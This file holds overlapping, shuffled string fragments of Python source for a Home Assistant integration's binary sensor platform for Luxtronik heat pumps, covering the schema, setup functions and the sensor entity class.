"device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in",
"sensor_key: str, unique_id: str, name: str, icon: str, device_class: str, state_class: str =",
"= self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def update(self): \"\"\"Get the",
"-> None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\",",
"bool = False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass",
"Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id",
"group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group,",
"(DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from",
"sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\")",
"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump')",
"self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class",
"a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\",",
"= hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids =",
"ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from",
"async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a",
"luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling",
"in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor",
"PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In(",
"not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None",
"hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = []",
"vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON):",
"name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category",
"+= [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None,",
"async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None:",
"] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary",
"binary states.\"\"\" # region Imports import logging from typing import Any, Final import",
"\"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key",
"vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) # endregion Constants # region",
"hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik",
"import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA",
"cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) # endregion",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if sensors:",
"vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) #",
"unique_id: str, name: str, icon: str, device_class: str, state_class: str = None, entity_category:",
"# if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities +=",
"no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater =",
"if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [",
"if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass,",
"Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string,",
"hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating",
"[ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion",
"= None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False ) -> None:",
"hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [",
"deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik,",
"discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no",
"text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked,",
"not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo =",
"sensors = config.get(CONF_SENSORS) entities = [] if sensors: # region Legacy part: for",
"cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from",
"ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from .const import *",
"else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik,",
"yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice =",
"str, unique_id: str, name: str, icon: str, device_class: str, state_class: str = None,",
"self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class",
"from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from",
"DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity",
"heatpump binary states.\"\"\" # region Imports import logging from typing import Any, Final",
"f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no",
"return not value if self._invert else value def update(self): \"\"\"Get the latest status",
"CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ],",
"import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing",
"deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities",
"Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation as cv import",
"name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling",
"= config.get(CONF_SENSORS) entities = [] if sensors: # region Legacy part: for sensor_cfg",
"import slugify from .const import * from .helpers.helper import get_sensor_text from .luxtronik_device import",
"import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES,",
"\"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik:",
"part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group",
"luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME)",
"deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class",
"device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang,",
"sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1]",
"cv.boolean, } ], ) } ) # endregion Constants # region Setup async",
"luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"]",
"for Luxtronik heatpump binary states.\"\"\" # region Imports import logging from typing import",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked",
"text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling,",
"__init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name:",
"deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity,",
"sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor =",
"# Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang,",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities =",
"create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name,",
"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling')",
"} ) # endregion Constants # region Setup async def async_setup_platform( hass: HomeAssistant,",
"if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id =",
"up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info:",
"unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None:",
"LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\",",
"entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater",
"= sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name =",
"= hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang",
"config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False",
"sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not",
"# region Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation as",
"async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set up a",
"HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import",
"async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\"",
"binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str,",
"not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl',",
"entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False ) -> None: \"\"\"Initialize a",
"hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon:",
"not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP,",
"@property def is_on(self): \"\"\"Return true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key)",
"vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from",
"vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) }",
"sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group",
") } ) # endregion Constants # region Setup async def async_setup_platform( hass:",
"LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo =",
"if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo",
"self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return",
"= invert_state @property def is_on(self): \"\"\"Return true if binary sensor is on.\"\"\" value",
"from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries",
"in group %s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def",
"%s in group %s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async",
"from .const import * from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice #",
"LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry",
"# endregion Constants # region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType,",
"entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS),",
"= luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info =",
"vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False):",
"deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning(",
"Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback )",
"RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik:",
"deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language:",
"ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon = icon",
"deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities",
"{ vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string,",
"= hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors =",
"cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE,",
"as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT",
"luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names",
"logging from typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as",
"= False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass =",
"not value if self._invert else value def update(self): \"\"\"Get the latest status and",
"sensor_id) if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id",
"'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ]",
"return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with",
"str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False",
"voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import",
"= hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling =",
"luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"]",
"= hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities +=",
"sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity):",
"sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME)",
"= None, invert_state: bool = False ) -> None: \"\"\"Initialize a new Luxtronik",
"import homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING,",
"vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string,",
".const import * from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion",
"unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation",
"homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from",
"name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) #",
"RestoreEntity from homeassistant.util import slugify from .const import * from .helpers.helper import get_sensor_text",
"cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } )",
"from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from",
"from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from .const import * from",
"def is_on(self): \"\"\"Return true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return",
"= state_class self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true",
"def update(self): \"\"\"Get the latest status and use it to update our sensor",
"as cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity)",
"import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor",
"ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import",
"] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group, )",
"\"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id,",
"'%s'\", entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get(",
"DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\",",
"group %s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry(",
"None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry)",
"<reponame>BenPru/luxtronik<gh_stars>1-10 \"\"\"Support for Luxtronik heatpump binary states.\"\"\" # region Imports import logging from",
"ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\")",
"sensors: # region Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if",
"sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0]",
"default=False): cv.boolean, } ], ) } ) # endregion Constants # region Setup",
"group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry:",
"= ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon =",
"CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from homeassistant.helpers.entity_platform import",
"get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports # region Constants PLATFORM_SCHEMA =",
"homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from .const",
"self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class = device_class",
"in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id",
